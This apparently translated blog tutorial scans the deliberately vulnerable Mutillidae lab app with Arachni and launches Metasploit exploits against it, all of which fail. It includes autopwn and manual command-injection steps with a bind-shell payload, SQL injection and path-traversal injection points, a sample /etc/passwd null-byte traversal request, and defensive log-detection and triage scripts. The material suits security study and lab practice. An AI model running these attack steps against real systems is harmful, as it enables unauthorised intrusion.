
WebApp exploitation with Arachni and Metasploit

程序员文章站 2022-04-22 11:02:51

Arachni, an open-source scanner, is well regarded for how efficiently and accurately it identifies vulnerabilities in web scripts. As a mainstream open-source scanner it naturally keeps up with the trend and works well together with Metasploit: through its msf plugin it integrates seamlessly with Metasploit.
Today we demonstrate using Arachni together with Metasploit to scan, test and attack a website. My test environment is:

metasploitable+backbox+arachni+metasploit

First we scan the target host with Arachni. The screenshots speak for themselves, so I will not add much commentary:

root@metasploit:/home/exploit/Desktop# arachni http://192.168.1.35/mutillidae/ --report=metareport:outfile=localhost.afr.msf
WARNING: gnome-keyring:: couldn't connect to: /tmp/keyring-avqGQf/pkcs11: No such file or directory
Arachni - Web Application Security Scanner Framework v0.4.2
Author: Tasos "Zapotek" Laskos 

(With the support of the community and the Arachni Team.)

Website: http://arachni-scanner.com
Documentation: http://arachni-scanner.com/wiki

[~] No modules were specified.
[~] -> Will run all mods.
[~] No audit options were specified.
[~] -> Will audit links, forms and cookies.


After the scan, the scan report is saved in msf format so that Metasploit can load it.

To bring the Arachni plugin into Metasploit, we need to locate the Arachni directory and copy external/metasploit into the Metasploit root directory:
cp -R arachni/external/metasploit/* /opt/backbox/msf/
Then start Metasploit and load the Arachni plugin, as shown below:

root@metasploit:~# msfconsole

[!] Warning: This tool is located in /opt/backbox/msf
[i] Remember to give the full absolute path when specifying a file

# cowsay++
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *

=[ metasploit v4.8.0-dev [core:4.8 api:1.0]
+ -- --=[ 1168 exploits - 641 auxiliary - 186 post
+ -- --=[ 312 payloads - 30 encoders - 8 nops

msf > load arachni
[+] Added 1 Auxiliary modules for Arachni
[+] Added 4 Exploit modules for Arachni
[*] Successfully loaded plugin: arachni
msf > arachni_load /root/localhost.afr.msf
[*] Loading report...
[*] Loaded 21 vulnerabilities.

Unique exploits
===============

ID Exploit Description
-- ------- -----------
1 auxiliary/arachni_sqlmap



Let's look at the options of Arachni's automatic attack (autopwn) command:

msf > arachni_autopwn
[*] Usage: arachni_autopwn [options]
-h Display this help text
-x [regexp] Only run modules whose name matches the regex
-a Launch exploits against all matched targets
-r Use a reverse connect shell
-b Use a bind shell on a random port (default)
-m Use a meterpreter shell (if possible)
-q Disable exploit module output

We choose to launch all matching exploits:


msf > arachni_autopwn -a
[*] Running pwn-jobs...

[*] [0 established sessions]): Waiting on 21 launched modules to finish execution...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running auxiliary/arachni_sqlmap
[*] Preparing datastore for 'SQL Injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/ ...
[*] [0 established sessions]): Waiting on 3 launched modules to finish execution...
[*] Running exploit/unix/webapp/arachni_exec
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...

[*] Started bind handler
[*] Running exploit/unix/webapp/arachni_path_traversal
[*] Preparing datastore for 'Path Traversal' vulnerability @ 192.168.1.35/mutillidae/index.php ...
[*] Sending HTTP request for /mutillidae/index.php
[*] [0 established sessions]): Waiting on 0 launched modules to finish execution...

[*] The autopwn command has completed with 0 sessions


Unfortunately, not a single one succeeded...

Next, let's see exactly which vulnerabilities Arachni found, with the following command:


msf > arachni_list_vulns

Vulnerabilities
===============

ID Host Path Name Method Params Exploit
-- ---- ---- ---- ------ ------ -------
1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
2 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
3 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create AccountXXinjectionXX", "my_signature"=>"1"} auxiliary/arachni_sqlmap
4 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret)", "confirm_password"=>"5543!%arachni_secretXXinjectionXX", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
5 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_nameXXinjectionXX", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
6 192.168.1.35 /mutillidae/index.php SQL Injection POST {"username"=>"arachni_name", "password"=>"5543!%arachni_secret", "confirm_password"=>"5543!%arachni_secret", "register-php-submit-button"=>"Create Account", "my_signature"=>"1"} auxiliary/arachni_sqlmap
7 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
8 192.168.1.35 /mutillidae/index.php SQL Injection POST {"ToolID"=>"0923ac83-8b50-4eda-ad81-f1aac6168c5cXXinjectionXX"} auxiliary/arachni_sqlmap
9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
10 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"showhints"=>"1XXinjectionXX"} auxiliary/arachni_sqlmap
11 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog EntriesXXinjectionXX", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68"} auxiliary/arachni_sqlmap
12 192.168.1.35 /mutillidae/index.php SQL Injection POST {"view-someones-blog-php-submit-button"=>"View Blog Entries", "author"=>"53241E83-76EC-4920-AD6D-503DD2A6BA68XXinjectionXX"} auxiliary/arachni_sqlmap
13 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "username"=>"arachni_name", "password"=>"5543!%arachni_secret", "user-info-php-submit-button"=>"View Account DetailsXXinjectionXX"} auxiliary/arachni_sqlmap
14 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_nameXXinjectionXX"} auxiliary/arachni_sqlmap
15 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secretXXinjectionXX", "user-info-php-submit-button"=>"View+Account+Details", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
16 192.168.1.35 /mutillidae/index.php SQL Injection GET {"page"=>"user-info.php", "password"=>"5543!%25arachni_secret", "user-info-php-submit-button"=>"View+Account+DetailsXXinjectionXX", "username"=>"arachni_name"} auxiliary/arachni_sqlmap
17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec
18 192.168.1.35 /mutillidae/ Path Traversal GET {"page"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
19 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "username"=>"anonymous"} unix/webapp/arachni_path_traversal
20 192.168.1.35 /mutillidae/index.php Path Traversal GET {"page"=>"XXinjectionXX\x00.php", "choice"=>"inSIDDer", "initials"=>"1", "user-poll-php-submit-button"=>"Submit Vote"} unix/webapp/arachni_path_traversal
21 192.168.1.35 /mutillidae/index.php Path Traversal POST {"page"=>"source-viewer.php", "source-file-viewer-php-submit-button"=>"View File", "phpfile"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
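
The 21 findings above are worth triaging before anything is run against them, since several are the same injection point reported under different paths (for example the PHPSESSID cookie at /mutillidae/ and at /mutillidae/index.php). The following Python script is an added example and is not part of the original post, of Arachni or of Metasploit. It parses rows in the arachni_list_vulns format shown above (a few of the page's own rows are embedded as sample input), converts the Ruby-style parameter hash into a Python dict, and reports which parameter carries the XXinjectionXX marker for each finding, grouped by vulnerability class, HTTP method and injected parameter.

```python
import ast
import re
from collections import Counter

MARKER = "XXinjectionXX"  # placeholder that the Arachni MSF modules substitute with the payload

# Rows copied from the arachni_list_vulns output above (a subset of the 21);
# the raw string keeps "\x00" as the two-character escape printed by msfconsole.
SAMPLE_ROWS = r"""
1 192.168.1.35 /mutillidae/index.php SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
9 192.168.1.35 /mutillidae/ SQL Injection COOKIE {"PHPSESSID"=>"adfea6c97ce98bfb3b779b2a2f7a893cXXinjectionXX"} auxiliary/arachni_sqlmap
17 192.168.1.35 /mutillidae/index.php Operating system command injection POST {"target_host"=>"XXinjectionXX", "dns-lookup-php-submit-button"=>"Lookup DNS"} unix/webapp/arachni_exec
18 192.168.1.35 /mutillidae/ Path Traversal GET {"page"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
21 192.168.1.35 /mutillidae/index.php Path Traversal POST {"page"=>"source-viewer.php", "source-file-viewer-php-submit-button"=>"View File", "phpfile"=>"XXinjectionXX\x00.php"} unix/webapp/arachni_path_traversal
"""

# Columns: ID Host Path Name Method Params Exploit. Name may contain spaces,
# so it is matched lazily up to the method token that precedes the "{...}" hash.
ROW_RE = re.compile(
    r'^(\d+) (\S+) (\S+) (.+?) (GET|POST|COOKIE|PUT|DELETE) (\{.*\}) (\S+)$'
)


def parse_params(ruby_hash: str) -> dict:
    """Turn Ruby's {"k"=>"v"} inspect output into a Python dict.

    Keys and values are double-quoted strings, so replacing "=>" with ":"
    yields a valid Python dict literal; literal_eval also decodes the printed
    \\x00 escape into a real null byte, as the server would have received it.
    """
    return ast.literal_eval(ruby_hash.replace("=>", ":"))


def parse_row(line: str) -> dict:
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")
    vid, host, path, name, method, params, exploit = m.groups()
    return {
        "id": int(vid), "host": host, "path": path, "name": name,
        "method": method, "params": parse_params(params), "exploit": exploit,
    }


def parse_report(text: str) -> list:
    return [parse_row(ln) for ln in text.splitlines() if ln.strip()]


def injection_point(record: dict):
    """Name of the parameter whose value carries the marker, or None."""
    for key, value in record["params"].items():
        if MARKER in str(value):
            return key
    return None


def summarize(records: list) -> Counter:
    """Count findings per (vulnerability class, method, injected parameter)."""
    return Counter(
        (r["name"], r["method"], injection_point(r)) for r in records
    )


if __name__ == "__main__":
    recs = parse_report(SAMPLE_ROWS)
    for (name, method, param), n in sorted(summarize(recs).items()):
        print(f"{n:2d}  {name:<36} {method:<6} {param}")
```

Grouping by injected parameter rather than by row id is what collapses the list into distinct fix sites: the two PHPSESSID rows are one cookie-handling bug, and the page parameter with its null-byte suffix is one include routine, however many forms reach it.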


Now let me, the old-fashioned way, exploit vulnerability 17 by hand:

msf> arachni_manual 17
[*] Using unix/webapp/arachni_exec .
[*] Preparing datastore for 'Operating system command injection' vulnerability @ 192.168.1.35/mutillidae/index.php ...
SRVHOST => 127.0.0.1
SRVPORT => 10401
RHOST => 192.168.1.35
RPORT => 80
LHOST => 127.0.0.1
LPORT => 5376
SSL => false
POST => target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS
METHOD => POST
COOKIES =>
HEADERS => Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c
PATH => /mutillidae/index.php
[*] Done!
PAYLOAD => cmd/unix/bind_perl
msf exploit(arachni_exec) >


Check the configuration for problems; if there are none, go ahead and run it:


msf exploit(arachni_exec) > show options

Module options (exploit/unix/webapp/arachni_exec):

Name Current Setting Required Description
---- --------------- -------- -----------
COOKIES no Cookies to be sent with the request. ('foo=bar;vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
GET no GET parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
HEADERS Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8::User-Agent=Arachni/v0.4.2::Cookie=showhints=1;PHPSESSID=adfea6c97ce98bfb3b779b2a2f7a893c no Headers to be sent with the request. ('User-Agent=bar::vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
PATH /mutillidae/index.php yes The path to the vulnerable script.
POST target_host=XXinjectionXX&dns-lookup-php-submit-button=Lookup DNS no POST parameters. ('foo=bar&vuln=XXinjectionXX', XXinjectionXX will be substituted with the payload.)
Proxies no Use a proxy chain
RHOST 192.168.1.35 yes The target address
RPORT 80 yes The target port
VHOST no HTTP server virtual host

Payload options (cmd/unix/bind_perl):

Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 5376 yes The listen port
RHOST 192.168.1.35 no The target address

Exploit target:

Id Name
-- ----
0 Automatic


It looks fine, so let's run it manually and see whether the luck I have saved up lately is enough.

-_-!!! No luck: both attempts failed.

msf exploit(arachni_exec) > exploit

[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) > exploit

[*] Started bind handler
[*] Sending HTTP request for /mutillidae/index.php
msf exploit(arachni_exec) >



Today's test environment really did not cooperate; not a single exploit succeeded. Still, the point here is only to show the process of using Arachni and Metasploit to test and attack a web application. This is just casual chatter, so experts may skip it; if you have questions, please leave a comment!!
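
From the defender's side, the datastore shown above reveals two things a web server log will contain while such a scan runs: the User-Agent header Arachni/v0.4.2, and query values ending in a null byte followed by .php (the \x00.php pattern from the Path Traversal findings, which reaches the server URL-encoded as %00.php). The script below is an added example and not part of the original post, of Arachni or of Metasploit. It reads constructed access-log lines in combined log format (addresses, timestamps and sizes are made up) and flags requests that carry a scanner User-Agent, a null byte in the decoded query string, or a ../ traversal sequence, returning the matching lines and the client addresses involved.

```python
import re
from urllib.parse import unquote

# Constructed combined-log-format lines (addresses, times and sizes are made up).
# Lines 2 and 3 carry the User-Agent the msfconsole datastore above shows, and
# line 2 carries the %00.php null-byte pattern from the Path Traversal findings.
SAMPLE_LOG = """\
10.0.0.7 - - [22/Apr/2022:11:02:51 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [22/Apr/2022:11:02:52 +0000] "GET /mutillidae/index.php?page=../../etc/passwd%00.php HTTP/1.1" 200 812 "-" "Arachni/v0.4.2"
10.0.0.9 - - [22/Apr/2022:11:02:53 +0000] "POST /mutillidae/index.php HTTP/1.1" 200 2048 "-" "Arachni/v0.4.2"
10.0.0.12 - - [22/Apr/2022:11:02:54 +0000] "GET /mutillidae/index.php?page=user-info.php&username=alice HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Combined log format: client ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# User-Agent prefixes treated as scanner traffic; Arachni/ is the one on the page.
SCANNER_UA_PREFIXES = ("Arachni/",)


def check_request(entry: dict) -> list:
    """Return the list of reasons this request looks like scanner traffic."""
    reasons = []
    if entry["ua"].startswith(SCANNER_UA_PREFIXES):
        reasons.append("scanner user-agent")
    target = entry["target"]
    # Decode once so %00 becomes a real null byte and %2e%2e%2f becomes ../
    query = unquote(target.split("?", 1)[1]) if "?" in target else ""
    if "\x00" in query:
        reasons.append("null byte in query")
    if "../" in query:
        reasons.append("traversal sequence in query")
    return reasons


def scan_log(text: str) -> list:
    """Parse each log line and keep those with at least one reason."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined-format line; skip it
        entry = m.groupdict()
        reasons = check_request(entry)
        if reasons:
            findings.append({"line": lineno, "client": entry["client"],
                             "target": entry["target"], "reasons": reasons})
    return findings


def flagged_clients(findings: list) -> set:
    """Distinct client addresses that produced at least one flagged request."""
    return {f["client"] for f in findings}


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['client']} {f['target']} -> {', '.join(f['reasons'])}")
```

The User-Agent check is the weakest of the three, since a scanner's UA string is trivially changed; the null-byte and traversal checks on the decoded query are the ones worth keeping as alerts, and the decoded-query step matters because the raw log line only ever shows %00.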